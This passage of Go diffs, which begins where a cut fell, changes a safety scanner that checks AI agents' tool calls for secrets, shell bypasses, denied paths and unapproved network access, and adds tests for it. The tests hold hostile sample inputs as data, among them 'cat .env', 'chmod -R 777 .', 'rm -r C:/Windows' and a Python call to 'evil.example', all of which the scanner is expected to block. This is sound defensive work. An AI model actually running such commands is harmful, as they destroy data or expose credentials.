+		return n > 8
+	}
+	return strings.Contains(lower, "gnu parallel")
+}
+
+func (s scanner) scanMetadata(req Request) []Finding {
+	if req.Metadata.Destructive {
+		return []Finding{newFinding(
+			DecisionNeedsHumanReview,
+			RiskMedium,
+			"tool.metadata_destructive",
+			[]string{"tool metadata marks the tool as destructive"},
+			"Require review for destructive tools unless a narrower policy "+
+				"allows this exact operation.",
+		)}
+	}
+	return nil
+}
+
+func (s scanner) scanEnv(env map[string]string) []Finding {
+	var findings []Finding
+	for k, v := range env {
+		if len(s.policy.EnvAllowlist) > 0 && !s.envAllowed(k) {
+			findings = append(findings, newFinding(
+				DecisionNeedsHumanReview,
+				RiskMedium,
+				"environment.non_whitelisted_variable",
+				[]string{fmt.Sprintf("environment variable %q is not allowlisted", k)},
+				"Pass only environment variables listed in env_allowlist or "+
+					"update the policy after review.",
+			))
+		}
+		findings = append(findings, s.scanSecretText(k+"="+v, "environment")...)
+	}
+	return findings
+}
+
+func (s scanner) envAllowed(key string) bool {
+	for _, allowed := range s.policy.EnvAllowlist {
+		if strings.EqualFold(strings.TrimSpace(allowed), key) {
+			return true
+		}
+	}
+	return false
+}
+
+func (s scanner) scanSecretText(text, source string) []Finding {
+	if !looksSensitive(text) {
+		return nil
+	}
+	return []Finding{newFinding(
+		DecisionDeny,
+		RiskCritical,
+		"sensitive.secret_leak",
+		[]string{fmt.Sprintf("%s contains a likely secret", source)},
+		"Remove API keys, tokens, passwords, private keys, and credential "+
+			"material from command arguments, logs, artifacts, and audit events.",
+	)}
+}
+
+func (s scanner) scanCodeBlock(block CodeBlock) []Finding {
+	lang := strings.ToLower(strings.TrimSpace(block.Language))
+	code := strings.TrimSpace(block.Code)
+	var findings []Finding
+	findings = append(findings, s.scanSecretText(code, "code block")...)
+	if lang == "bash" || lang == "sh" || lang == "shell" || lang == "" {
+		req := Request{
+			ToolName: "code_block",
+			Command:  code,
+			Backend:  BackendCodeExec,
+		}
+		findings = append(findings, s.scanShell(req, code)...)
+		return findings
+	}
+	lower := strings.ToLower(code)
+	if strings.Contains(lower, "os.system") ||
+		strings.Contains(lower, "subprocess.") ||
+		strings.Contains(lower, "exec(") {
+		findings = append(findings, newFinding(
+			DecisionNeedsHumanReview,
+			RiskMedium,
+			"codeexec.host_command_bridge",
+			[]string{fmt.Sprintf("%s code can launch shell commands", lang)},
+			"Review code that bridges from code execution into shell execution.",
+		))
+	}
+	findings = append(findings, s.scanNetwork(code)...)
+	findings = append(findings, s.scanResourcePatterns(lower)...)
+	return findings
+}
+
+func hasShellBypass(lower string) bool {
+	patterns := []string{
+		"sh -c", "bash -c", "zsh -c", "eval ", "`", "$(",
+		"${", ">", "<", " 2>", "exec ",
+	}
+	return slices.ContainsFunc(patterns, func(p string) bool {
+		return strings.Contains(lower, p)
+	})
+}
+
+func containsPipeline(command string) bool {
+	inSingle := false
+	inDouble := false
+	for i := 0; i < len(command); i++ {
+		switch command[i] {
+		case '\'':
+			if !inDouble {
+				inSingle = !inSingle
+			}
+		case '"':
+			if !inSingle {
+				inDouble = !inDouble
+			}
+		case '|', ';':
+			if !inSingle && !inDouble {
+				return true
+			}
+		case '&':
+			if !inSingle && !inDouble && i+1 < len(command) && command[i+1] == '&' {
+				return true
+			}
+		}
+	}
+	return false
+}
+
+func (s scanner) commandDenied(name string) bool {
+	for _, denied := range s.policy.DeniedCommands {
+		if strings.EqualFold(commandName(denied), name) {
+			return true
+		}
+	}
+	return false
+}
+
+func (s scanner) commandAllowed(name string) bool {
+	for _, allowed := range s.policy.AllowedCommands {
+		if strings.EqualFold(commandName(allowed), name) {
+			return true
+		}
+	}
+	return false
+}
+
+func commandName(name string) string {
+	name = strings.TrimSpace(strings.Trim(name, `"'`))
+	name = strings.ReplaceAll(name, "\\", "/")
+	base := filepath.Base(name)
+	base = strings.TrimSuffix(base, ".exe")
+	base = strings.TrimSuffix(base, ".cmd")
+	base = strings.TrimSuffix(base, ".bat")
+	base = strings.TrimSuffix(base, ".com")
+	return strings.ToLower(base)
+}
+
+func containsArg(argv []string, want string) bool {
+	return slices.ContainsFunc(argv, func(arg string) bool {
+		return arg == want
+	})
+}
+
+func newFinding(
+	decision Decision,
+	risk RiskLevel,
+	ruleID string,
+	evidence []string,
+	recommendation string,
+) Finding {
+	return Finding{
+		Decision:       decision,
+		RiskLevel:      risk,
+		RuleID:         ruleID,
+		Evidence:       evidence,
+		Recommendation: recommendation,
+	}
+}
+
+var (
+	secretNameRE = regexp.MustCompile(
+		`(?i)(api[_-]?key|token|password|passwd|secret|private[_-]?key|credential)`)
+	secretValueRE = regexp.MustCompile(
+		`(?i)(sk-[A-Za-z0-9_-]{12,}|ghp_[A-Za-z0-9_]{12,}|xox[baprs]-[A-Za-z0-9-]{10,}|-----BEGIN [A-Z ]*PRIVATE KEY-----)`)
+)
+
+func looksSensitive(text string) bool {
+	return secretValueRE.MatchString(text) ||
+		(secretNameRE.MatchString(text) && strings.Contains(text, "="))
+}
+
+type redactor struct {
+	changed bool
+}
+
+func newRedactor() *redactor { return &redactor{} }
+
+func (r *redactor) redact(s string) string {
+	orig := s
+	s = secretValueRE.ReplaceAllString(s, "[REDACTED_SECRET]")
+	nameValue := regexp.MustCompile(
+		`(?i)(api[_-]?key|token|password|passwd|secret|private[_-]?key|credential)=([^ \t\n\r;&|]+)`)
+	s = nameValue.ReplaceAllString(s, "$1=[REDACTED_SECRET]")
+	if s != orig {
+		r.changed = true
+	}
+	return s
+}
+
+func redactList(r *redactor, in []string) []string {
+	if len(in) == 0 {
+		return nil
+	}
+	out := make([]string, len(in))
+	for i, s := range in {
+		out[i] = r.redact(s)
+	}
+	return out
+}
+
+// ValidateReport checks that a report has the fields required by the safety
+// contract. It is mainly useful for examples and tests.
+func ValidateReport(report Report) error {
+	if report.Decision == "" {
+		return errors.New("missing decision")
+	}
+	if report.RiskLevel == "" {
+		return errors.New("missing risk_level")
+	}
+	if report.Decision != DecisionAllow && report.RuleID == "" {
+		return errors.New("missing rule_id")
+	}
+	if report.Decision != DecisionAllow && len(report.Evidence) == 0 {
+		return errors.New("missing evidence")
+	}
+	if report.Recommendation == "" {
+		return errors.New("missing recommendation")
+	}
+	return nil
+}

--- a/tool/safety/safety.go
+++ b/tool/safety/safety.go
@@ -76,7 +76,7 @@ type Policy struct {
 	ReviewShellPipelines bool     `json:"review_shell_pipelines,omitempty" yaml:"review_shell_pipelines,omitempty"`
 	DenyOnParseError     bool     `json:"deny_on_parse_error,omitempty" yaml:"deny_on_parse_error,omitempty"`
 
-	loaded bool
+	defaultsSet bool
 }
 
 // DefaultPolicy returns a conservative policy suitable for workspaceexec,
@@ -112,6 +112,7 @@ func DefaultPolicy() Policy {
 			"PATH", "HOME", "TMPDIR", "TEMP", "TMP", "LANG", "LC_ALL",
 			"CGO_ENABLED", "GOCACHE", "GOMODCACHE", "GOPATH",
 		},
+		defaultsSet: true,
 	}
 }
 
@@ -134,7 +135,7 @@ func LoadPolicy(path string) (Policy, error) {
 	if err != nil {
 		return Policy{}, err
 	}
-	p.loaded = true
+	p.defaultsSet = true
 	return p, nil
 }
 
@@ -161,10 +162,10 @@ func (p Policy) withDefaults() Policy {
 	if p.ReviewCommands == nil {
 		p.ReviewCommands = d.ReviewCommands
 	}
-	if !p.loaded && !p.ReviewShellPipelines {
+	if !p.defaultsSet && !p.ReviewShellPipelines {
 		p.ReviewShellPipelines = d.ReviewShellPipelines
 	}
-	if !p.loaded && !p.DenyOnParseError {
+	if !p.defaultsSet && !p.DenyOnParseError {
 		p.DenyOnParseError = d.DenyOnParseError
 	}
 	return p

--- a/tool/safety/safety.go
+++ b/tool/safety/safety.go
@@ -11,7 +11,6 @@
 package safety
 
 import (
-	"bufio"
 	"encoding/json"
 	"errors"
 	"fmt"
@@ -76,7 +75,8 @@ type Policy struct {
 	ReviewShellPipelines bool     `json:"review_shell_pipelines,omitempty" yaml:"review_shell_pipelines,omitempty"`
 	DenyOnParseError     bool     `json:"deny_on_parse_error,omitempty" yaml:"deny_on_parse_error,omitempty"`
 
-	defaultsSet bool
+	reviewShellPipelinesSet bool
+	denyOnParseErrorSet     bool
 }
 
 // DefaultPolicy returns a conservative policy suitable for workspaceexec,
@@ -112,7 +112,8 @@ func DefaultPolicy() Policy {
 			"PATH", "HOME", "TMPDIR", "TEMP", "TMP", "LANG", "LC_ALL",
 			"CGO_ENABLED", "GOCACHE", "GOMODCACHE", "GOPATH",
 		},
-		defaultsSet: true,
+		reviewShellPipelinesSet: true,
+		denyOnParseErrorSet:     true,
 	}
 }
 
@@ -123,19 +124,34 @@ func LoadPolicy(path string) (Policy, error) {
 	if err != nil {
 		return Policy{}, err
 	}
-	p := DefaultPolicy()
+	var raw map[string]any
 	switch strings.ToLower(filepath.Ext(path)) {
 	case ".json":
-		err = json.Unmarshal(b, &p)
+		err = json.Unmarshal(b, &raw)
 	case ".yaml", ".yml", "":
-		err = yaml.Unmarshal(b, &p)
+		err = yaml.Unmarshal(b, &raw)
 	default:
 		err = fmt.Errorf("unsupported policy extension %q", filepath.Ext(path))
 	}
 	if err != nil {
 		return Policy{}, err
 	}
-	p.defaultsSet = true
+	p := DefaultPolicy()
+	switch strings.ToLower(filepath.Ext(path)) {
+	case ".json":
+		err = json.Unmarshal(b, &p)
+	default:
+		err = yaml.Unmarshal(b, &p)
+	}
+	if err != nil {
+		return Policy{}, err
+	}
+	if _, ok := raw["review_shell_pipelines"]; ok {
+		p.reviewShellPipelinesSet = true
+	}
+	if _, ok := raw["deny_on_parse_error"]; ok {
+		p.denyOnParseErrorSet = true
+	}
 	return p, nil
 }
 
@@ -162,10 +178,10 @@ func (p Policy) withDefaults() Policy {
 	if p.ReviewCommands == nil {
 		p.ReviewCommands = d.ReviewCommands
 	}
-	if !p.defaultsSet && !p.ReviewShellPipelines {
+	if !p.reviewShellPipelinesSet && !p.ReviewShellPipelines {
 		p.ReviewShellPipelines = d.ReviewShellPipelines
 	}
-	if !p.defaultsSet && !p.DenyOnParseError {
+	if !p.denyOnParseErrorSet && !p.DenyOnParseError {
 		p.DenyOnParseError = d.DenyOnParseError
 	}
 	return p
@@ -277,14 +293,11 @@ func WriteAuditJSONL(w io.Writer, report Report) error {
 	if err != nil {
 		return err
 	}
-	bw := bufio.NewWriter(w)
-	if _, err := bw.Write(b); err != nil {
+	b = append(b, '\n')
+	if _, err := w.Write(b); err != nil {
 		return err
 	}
-	if err := bw.WriteByte('\n'); err != nil {
-		return err
-	}
-	return bw.Flush()
+	return nil
 }
 
 // AppendAuditFile appends one report event to a JSONL audit file.
@@ -320,9 +333,10 @@ func (s scanner) scan(req Request) Report {
 	findings := make([]Finding, 0, 4)
 	findings = append(findings, s.scanMetadata(req)...)
 	findings = append(findings, s.scanEnv(req.Env)...)
+	findings = append(findings, s.scanRequestEnvelope(req)...)
 	if len(req.CodeBlocks) > 0 {
 		for _, block := range req.CodeBlocks {
-			findings = append(findings, s.scanCodeBlock(block)...)
+			findings = append(findings, s.scanCodeBlock(req, block)...)
 		}
 	} else {
 		findings = append(findings, s.scanShell(req, cmd)...)
@@ -338,6 +352,61 @@ func (s scanner) scan(req Request) Report {
 	}
 	report.Redacted = redactor.changed
 	return report
+}
+
+func (s scanner) scanRequestEnvelope(req Request) []Finding {
+	var findings []Finding
+	if s.pathDenied(req.Cwd) {
+		findings = append(findings, newFinding(
+			DecisionDeny,
+			RiskCritical,
+			"sensitive.cwd_access",
+			[]string{fmt.Sprintf("working directory %q is denied", req.Cwd)},
+			"Choose a workspace-relative working directory that does not "+
+				"point at system paths, SSH material, credentials, or secrets.",
+		))
+	}
+	if req.Backend == BackendHostExec && (req.Background || req.TTY) {
+		findings = append(findings, newFinding(
+			DecisionNeedsHumanReview,
+			RiskHigh,
+			"hostexec.long_session",
+			[]string{"hostexec requested background or PTY execution"},
+			"Require human approval for host PTY/background sessions and "+
+				"ensure timeout, process-group cleanup, and output caps are enforced.",
+		))
+	}
+	if req.Background {
+		findings = append(findings, newFinding(
+			DecisionNeedsHumanReview,
+			RiskMedium,
+			"process.background",
+			[]string{"command may leave a background process behind"},
+			"Run foreground commands with a bounded timeout, or record the "+
+				"session id and cleanup plan.",
+		))
+	}
+	if req.TimeoutSeconds > s.policy.MaxTimeoutSeconds {
+		findings = append(findings, newFinding(
+			DecisionDeny,
+			RiskHigh,
+			"resource.timeout_exceeded",
+			[]string{fmt.Sprintf("timeout %ds exceeds policy max %ds",
+				req.TimeoutSeconds, s.policy.MaxTimeoutSeconds)},
+			"Use a shorter timeout or update the safety policy after review.",
+		))
+	}
+	if req.MaxOutputBytes > s.policy.MaxOutputBytes {
+		findings = append(findings, newFinding(
+			DecisionDeny,
+			RiskHigh,
+			"resource.output_limit_exceeded",
+			[]string{fmt.Sprintf("requested output cap %d exceeds policy max %d",
+				req.MaxOutputBytes, s.policy.MaxOutputBytes)},
+			"Lower the output cap or collect a bounded artifact instead.",
+		))
+	}
+	return findings
 }
 
 func (s scanner) reportFromFindings(
@@ -475,16 +544,6 @@ func (s scanner) scanRawCommand(req Request, command string) []Finding {
 	var findings []Finding
 	lower := strings.ToLower(command)
 	findings = append(findings, s.scanSecretText(command, "command")...)
-	if s.pathDenied(req.Cwd) {
-		findings = append(findings, newFinding(
-			DecisionDeny,
-			RiskCritical,
-			"sensitive.cwd_access",
-			[]string{fmt.Sprintf("working directory %q is denied", req.Cwd)},
-			"Choose a workspace-relative working directory that does not "+
-				"point at system paths, SSH material, credentials, or secrets.",
-		))
-	}
 	if hasShellBypass(lower) {
 		findings = append(findings, newFinding(
 			DecisionDeny,
@@ -506,17 +565,7 @@ func (s scanner) scanRawCommand(req Request, command string) []Finding {
 				"a small audited script.",
 		))
 	}
-	if req.Backend == BackendHostExec && (req.Background || req.TTY) {
-		findings = append(findings, newFinding(
-			DecisionNeedsHumanReview,
-			RiskHigh,
-			"hostexec.long_session",
-			[]string{"hostexec requested background or PTY execution"},
-			"Require human approval for host PTY/background sessions and "+
-				"ensure timeout, process-group cleanup, and output caps are enforced.",
-		))
-	}
-	if req.Background || strings.Contains(lower, " &") || strings.HasSuffix(lower, "&") {
+	if strings.Contains(lower, " &") || strings.HasSuffix(lower, "&") {
 		findings = append(findings, newFinding(
 			DecisionNeedsHumanReview,
 			RiskMedium,
@@ -524,26 +573,6 @@ func (s scanner) scanRawCommand(req Request, command string) []Finding {
 			[]string{"command may leave a background process behind"},
 			"Run foreground commands with a bounded timeout, or record the "+
 				"session id and cleanup plan.",
-		))
-	}
-	if req.TimeoutSeconds > s.policy.MaxTimeoutSeconds {
-		findings = append(findings, newFinding(
-			DecisionDeny,
-			RiskHigh,
-			"resource.timeout_exceeded",
-			[]string{fmt.Sprintf("timeout %ds exceeds policy max %ds",
-				req.TimeoutSeconds, s.policy.MaxTimeoutSeconds)},
-			"Use a shorter timeout or update the safety policy after review.",
-		))
-	}
-	if req.MaxOutputBytes > s.policy.MaxOutputBytes {
-		findings = append(findings, newFinding(
-			DecisionDeny,
-			RiskHigh,
-			"resource.output_limit_exceeded",
-			[]string{fmt.Sprintf("requested output cap %d exceeds policy max %d",
-				req.MaxOutputBytes, s.policy.MaxOutputBytes)},
-			"Lower the output cap or collect a bounded artifact instead.",
 		))
 	}
 	findings = append(findings, s.scanResourcePatterns(lower)...)
@@ -709,6 +738,9 @@ func normalizePathForMatch(path string) string {
 	p = strings.TrimPrefix(p, "~/")
 	p = strings.TrimPrefix(p, "./")
 	p = strings.ToLower(p)
+	if p == "/" {
+		return p
+	}
 	return strings.Trim(p, "/")
 }
 
@@ -918,18 +950,18 @@ func (s scanner) scanSecretText(text, source string) []Finding {
 	)}
 }
 
-func (s scanner) scanCodeBlock(block CodeBlock) []Finding {
+func (s scanner) scanCodeBlock(req Request, block CodeBlock) []Finding {
 	lang := strings.ToLower(strings.TrimSpace(block.Language))
 	code := strings.TrimSpace(block.Code)
 	var findings []Finding
 	findings = append(findings, s.scanSecretText(code, "code block")...)
 	if lang == "bash" || lang == "sh" || lang == "shell" || lang == "" {
-		req := Request{
-			ToolName: "code_block",
-			Command:  code,
-			Backend:  BackendCodeExec,
-		}
-		findings = append(findings, s.scanShell(req, code)...)
+		shellReq := req
+		shellReq.ToolName = "code_block"
+		shellReq.Command = code
+		shellReq.Backend = BackendCodeExec
+		shellReq.CodeBlocks = nil
+		findings = append(findings, s.scanShell(shellReq, code)...)
 		return findings
 	}
 	lower := strings.ToLower(code)

--- a/tool/safety/safety_test.go
+++ b/tool/safety/safety_test.go
@@ -10,6 +10,7 @@ package safety
 
 import (
 	"bytes"
+	"context"
 	"encoding/json"
 	"os"
 	"path/filepath"
@@ -232,11 +233,35 @@ allowed_commands:
 	}
 }
 
+func TestDefaultPolicyPreservesProgrammaticFalseOverrides(t *testing.T) {
+	policy := DefaultPolicy()
+	policy.ReviewShellPipelines = false
+	policy.DenyOnParseError = false
+
+	report := Scan(Request{
+		ToolName: "workspace_exec",
+		Backend:  BackendWorkspaceExec,
+		Command:  "cat README.md | wc -l",
+	}, policy)
+	if report.Decision != DecisionAllow {
+		t.Fatalf("pipeline decision = %q, want allow; report: %+v", report.Decision, report)
+	}
+
+	report = Scan(Request{
+		ToolName: "workspace_exec",
+		Backend:  BackendWorkspaceExec,
+		Command:  "echo 'unterminated",
+	}, policy)
+	if report.Decision != DecisionAsk {
+		t.Fatalf("parse decision = %q, want ask; report: %+v", report.Decision, report)
+	}
+}
+
 func TestPermissionPolicyBlocksAndAudits(t *testing.T) {
 	args := []byte(`{"command":"cat .env","timeout_sec":10}`)
 	var audit bytes.Buffer
 	policy := NewPermissionPolicy(DefaultPolicy(), WithAuditWriter(&audit))
-	decision, err := policy.CheckToolPermission(nil, &tool.PermissionRequest{
+	decision, err := policy.CheckToolPermission(context.Background(), &tool.PermissionRequest{
 		ToolName:  "workspace_exec",
 		Arguments: args,
 	})
@@ -261,7 +286,7 @@ func TestPermissionPolicyBlocksAndAudits(t *testing.T) {
 func TestPermissionPolicyMapsReviewToAsk(t *testing.T) {
 	args := []byte(`{"command":"npm install left-pad"}`)
 	policy := NewPermissionPolicy(DefaultPolicy())
-	decision, err := policy.CheckToolPermission(nil, &tool.PermissionRequest{
+	decision, err := policy.CheckToolPermission(context.Background(), &tool.PermissionRequest{
 		ToolName:  "workspace_exec",
 		Arguments: args,
 	})
@@ -270,6 +295,34 @@ func TestPermissionPolicyMapsReviewToAsk(t *testing.T) {
 	}
 	if decision.Action != tool.PermissionActionAsk {
 		t.Fatalf("action = %q, want ask", decision.Action)
+	}
+}
+
+func TestNilPermissionPolicyFailsClosed(t *testing.T) {
+	var policy *PermissionPolicy
+	decision, err := policy.CheckToolPermission(context.Background(), &tool.PermissionRequest{
+		ToolName:  "workspace_exec",
+		Arguments: []byte(`{"command":"go test ./..."}`),
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if decision.Action != tool.PermissionActionDeny {
+		t.Fatalf("action = %q, want deny", decision.Action)
+	}
+}
+
+func TestPermissionPolicyAllowsNullCodeBlocksNoop(t *testing.T) {
+	policy := NewPermissionPolicy(DefaultPolicy())
+	decision, err := policy.CheckToolPermission(context.Background(), &tool.PermissionRequest{
+		ToolName:  "execute_code",
+		Arguments: []byte(`{"code_blocks":null}`),
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if decision.Action != tool.PermissionActionAllow {
+		t.Fatalf("action = %q, want allow", decision.Action)
 	}
 }
 

--- a/tool/safety/safety_test.go
+++ b/tool/safety/safety_test.go
@@ -459,8 +459,33 @@ func TestPermissionPolicyAllowsNullCodeBlocksNoop(t *testing.T) {
 	}
 }
 
+func TestPermissionPolicyAllowsCodeExecBlocksAndDeniesBadBlocks(t *testing.T) {
+	policy := NewPermissionPolicy(DefaultPolicy())
+	decision, err := policy.CheckToolPermission(context.Background(), &tool.PermissionRequest{
+		ToolName:  "execute_code",
+		Arguments: []byte(`{"code_blocks":[{"language":"python","code":"print(1)"}]}`),
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if decision.Action != tool.PermissionActionAllow {
+		t.Fatalf("valid code block action = %q, want allow", decision.Action)
+	}
+
+	decision, err = policy.CheckToolPermission(context.Background(), &tool.PermissionRequest{
+		ToolName:  "execute_code",
+		Arguments: []byte(`{"code_blocks":42}`),
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if decision.Action != tool.PermissionActionDeny ||
+		!strings.Contains(decision.Reason, "code_blocks") {
+		t.Fatalf("bad code block decision = %+v, want deny with code_blocks reason", decision)
+	}
+}
+
 func TestRequestFromPermissionRequestParsesExecMetadata(t *testing.T) {
-	pty := true
 	req, ok, err := RequestFromPermissionRequest(&tool.PermissionRequest{
 		ToolName: "exec_command",
 		Arguments: []byte(`{
@@ -468,18 +493,37 @@ func TestRequestFromPermissionRequestParsesExecMetadata(t *testing.T) {
 			"workdir":"/tmp/work",
 			"env":{"PATH":"/bin"},
 			"background":true,
-			"timeoutSec":12
+			"timeoutSec":12,
+			"pty":true
 		}`),
 		Metadata: tool.ToolMetadata{Destructive: true},
 	})
 	if err != nil {
 		t.Fatal(err)
 	}
-	req.TTY = boolValue(&pty)
 	if !ok || req.Backend != BackendHostExec || req.Cwd != "/tmp/work" ||
-		req.TimeoutSeconds != 12 || !req.Background ||
+		req.TimeoutSeconds != 12 || !req.Background || !req.TTY ||
 		!req.Metadata.Destructive || req.Env["PATH"] != "/bin" {
 		t.Fatalf("unexpected request: %+v", req)
+	}
+}
+
+func TestRequestFromPermissionRequestParsesTTYAndTimeoutSec(t *testing.T) {
+	req, ok, err := RequestFromPermissionRequest(&tool.PermissionRequest{
+		ToolName: "workspace_exec",
+		Arguments: []byte(`{
+			"command":"go test ./...",
+			"cwd":".",
+			"timeout_sec":7,
+			"tty":true
+		}`),
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if !ok || req.Backend != BackendWorkspaceExec || req.Cwd != "." ||
+		req.TimeoutSeconds != 7 || !req.TTY {
+		t.Fatalf("unexpected request: %+v ok=%v", req, ok)
 	}
 }
 
@@ -571,6 +615,61 @@ func TestScanMetadataEnvAndTelemetry(t *testing.T) {
 	}
 }
 
+func TestValidateReportMissingFields(t *testing.T) {
+	tests := []struct {
+		name   string
+		report Report
+		want   string
+	}{
+		{
+			name:   "decision",
+			report: Report{},
+			want:   "missing decision",
+		},
+		{
+			name:   "risk",
+			report: Report{Decision: DecisionAllow},
+			want:   "missing risk_level",
+		},
+		{
+			name: "rule",
+			report: Report{
+				Decision:       DecisionDeny,
+				RiskLevel:      RiskHigh,
+				Recommendation: "fix it",
+			},
+			want: "missing rule_id",
+		},
+		{
+			name: "evidence",
+			report: Report{
+				Decision:       DecisionDeny,
+				RiskLevel:      RiskHigh,
+				RuleID:         "rule",
+				Recommendation: "fix it",
+			},
+			want: "missing evidence",
+		},
+		{
+			name: "recommendation",
+			report: Report{
+				Decision:  DecisionAllow,
+				RiskLevel: RiskLow,
+			},
+			want: "missing recommendation",
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			err := ValidateReport(tt.report)
+			if err == nil || !strings.Contains(err.Error(), tt.want) {
+				t.Fatalf("ValidateReport() error = %v, want %q", err, tt.want)
+			}
+		})
+	}
+}
+
 func TestScanDeniedCWD(t *testing.T) {
 	report := Scan(Request{
 		ToolName: "workspace_exec",
@@ -601,6 +700,59 @@ func TestScanDeniedRootPath(t *testing.T) {
 	}, DefaultPolicy())
 	if report.Decision != DecisionDeny || report.RuleID != "sensitive.path_access" {
 		t.Fatalf("root path argument should be denied: %+v", report)
+	}
+}
+
+func TestScanAdditionalRuleBranches(t *testing.T) {
+	tests := []struct {
+		name   string
+		cmd    string
+		ruleID string
+	}{
+		{
+			name:   "recursive chmod",
+			cmd:    "chmod -R 777 .",
+			ruleID: "dangerous.recursive_chmod",
+		},
+		{
+			name:   "network command without target",
+			cmd:    "curl --head",
+			ruleID: "network.unresolved_target",
+		},
+		{
+			name:   "python large output",
+			cmd:    "python -c 'print(\"x\" * 9999999)'",
+			ruleID: "resource.large_output",
+		},
+		{
+			name:   "parallel high concurrency",
+			cmd:    "parallel -j 64 echo ::: a b c",
+			ruleID: "resource.high_concurrency",
+		},
+		{
+			name:   "infinite loop",
+			cmd:    "for ;; do echo x; done",
+			ruleID: "resource.infinite_loop",
+		},
+		{
+			name:   "windows system path delete",
+			cmd:    "rm -r C:/Windows",
+			ruleID: "dangerous.rm_rf",
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			report := Scan(Request{
+				ToolName: "workspace_exec",
+				Backend:  BackendWorkspaceExec,
+				Command:  tt.cmd,
+			}, DefaultPolicy())
+			if report.RuleID != tt.ruleID {
+				t.Fatalf("rule id = %q, want %q; report: %+v",
+					report.RuleID, tt.ruleID, report)
+			}
+		})
 	}
 }
 
@@ -679,6 +831,33 @@ func TestScanCodeExecAppliesRequestEnvelope(t *testing.T) {
 	}
 }
 
+func TestScanCodeExecShellAndNonShellBranches(t *testing.T) {
+	report := Scan(Request{
+		ToolName: "execute_code",
+		Backend:  BackendCodeExec,
+		CodeBlocks: []CodeBlock{{
+			Language: "bash",
+			Code:     "go test ./...",
+		}},
+	}, DefaultPolicy())
+	if report.Decision != DecisionAllow {
+		t.Fatalf("bash code block should be allowed: %+v", report)
+	}
+
+	report = Scan(Request{
+		ToolName: "execute_code",
+		Backend:  BackendCodeExec,
+		CodeBlocks: []CodeBlock{{
+			Language: "python",
+			Code:     "import urllib.request; urllib.request.urlopen('https://evil.example')",
+		}},
+	}, DefaultPolicy())
+	if report.Decision != DecisionDeny ||
+		report.RuleID != "network.non_whitelisted_domain" {
+		t.Fatalf("python network code block should be denied: %+v", report)
+	}
+}
+
 func TestScanHighConcurrencyNeedsReview(t *testing.T) {
 	report := Scan(Request{
 		ToolName: "workspace_exec",
@@ -708,6 +887,47 @@ func TestScanFiveHundredCommandsUnderOneSecond(t *testing.T) {
 	}
 	if report.Decision != DecisionAllow {
 		t.Fatalf("unexpected report: %+v", report)
+	}
+}
+
+func TestAuditHelpersHandleNoopAndErrors(t *testing.T) {
+	report := Scan(Request{
+		ToolName: "workspace_exec",
+		Backend:  BackendWorkspaceExec,
+		Command:  "go test ./...",
+	}, DefaultPolicy())
+	if err := WriteAuditJSONL(nil, report); err != nil {
+		t.Fatalf("WriteAuditJSONL(nil) error = %v", err)
+	}
+	if err := AppendAuditFile("", report); err != nil {
+		t.Fatalf("AppendAuditFile(empty) error = %v", err)
+	}
+	missingParent := filepath.Join(t.TempDir(), "missing", "audit.jsonl")
+	if err := AppendAuditFile(missingParent, report); err == nil {
+		t.Fatal("AppendAuditFile missing parent error = nil")
+	}
+}
+
+func TestPermissionReasonWithoutEvidence(t *testing.T) {
+	reason := permissionReason(Report{
+		Decision:       DecisionDeny,
+		Recommendation: "provide a command",
+	})
+	if !strings.Contains(reason, "tool safety guard deny") ||
+		!strings.Contains(reason, "provide a command") {
+		t.Fatalf("unexpected reason: %q", reason)
+	}
+}
+
+func TestContainsPipelineIgnoresQuotedSeparators(t *testing.T) {
+	if containsPipeline(`echo "a|b"`) {
+		t.Fatal("double-quoted pipe should not count as pipeline")
+	}
+	if containsPipeline(`echo 'a;b'`) {
+		t.Fatal("single-quoted semicolon should not count as pipeline")
+	}
+	if !containsPipeline("go test ./... && go vet ./...") {
+		t.Fatal("&& should count as a command chain")
 	}
 }
 

--- a/tool/safety/safety_test.go
+++ b/tool/safety/safety_test.go
@@ -12,6 +12,7 @@ import (
 	"bytes"
 	"context"
 	"encoding/json"
+	"errors"
 	"os"
 	"path/filepath"
 	"strings"
@@ -233,6 +234,42 @@ allowed_commands:
 	}
 }
 
+func TestLoadPolicyCanDisableParseErrorDeny(t *testing.T) {
+	dir := t.TempDir()
+	path := filepath.Join(dir, "tool_safety_policy.json")
+	content := []byte(`{
+  "deny_on_parse_error": false,
+  "allowed_commands": ["echo"]
+}`)
+	if err := os.WriteFile(path, content, 0o600); err != nil {
+		t.Fatal(err)
+	}
+	policy, err := LoadPolicy(path)
+	if err != nil {
+		t.Fatal(err)
+	}
+	report := Scan(Request{
+		ToolName: "workspace_exec",
+		Backend:  BackendWorkspaceExec,
+		Command:  "echo 'unterminated",
+	}, policy)
+	if report.Decision != DecisionAsk || report.RuleID != "shellsafe.parse_error" {
+		t.Fatalf("unexpected report: %+v", report)
+	}
+}
+
+func TestPolicyZeroValueKeepsConservativeDefaults(t *testing.T) {
+	report := Scan(Request{
+		ToolName: "workspace_exec",
+		Backend:  BackendWorkspaceExec,
+		Command:  "cat README.md | wc -l",
+	}, Policy{})
+	if report.Decision != DecisionNeedsHumanReview ||
+		report.RuleID != "shell.pipeline_review" {
+		t.Fatalf("zero-value policy should inherit pipeline review: %+v", report)
+	}
+}
+
 func TestDefaultPolicyPreservesProgrammaticFalseOverrides(t *testing.T) {
 	policy := DefaultPolicy()
 	policy.ReviewShellPipelines = false
@@ -254,6 +291,28 @@ func TestDefaultPolicyPreservesProgrammaticFalseOverrides(t *testing.T) {
 	}, policy)
 	if report.Decision != DecisionAsk {
 		t.Fatalf("parse decision = %q, want ask; report: %+v", report.Decision, report)
+	}
+}
+
+func TestLoadPolicyErrors(t *testing.T) {
+	if _, err := LoadPolicy(filepath.Join(t.TempDir(), "missing.yaml")); err == nil {
+		t.Fatal("LoadPolicy missing file error = nil")
+	}
+
+	badJSON := filepath.Join(t.TempDir(), "bad.json")
+	if err := os.WriteFile(badJSON, []byte(`{`), 0o600); err != nil {
+		t.Fatal(err)
+	}
+	if _, err := LoadPolicy(badJSON); err == nil {
+		t.Fatal("LoadPolicy bad JSON error = nil")
+	}
+
+	badExt := filepath.Join(t.TempDir(), "policy.toml")
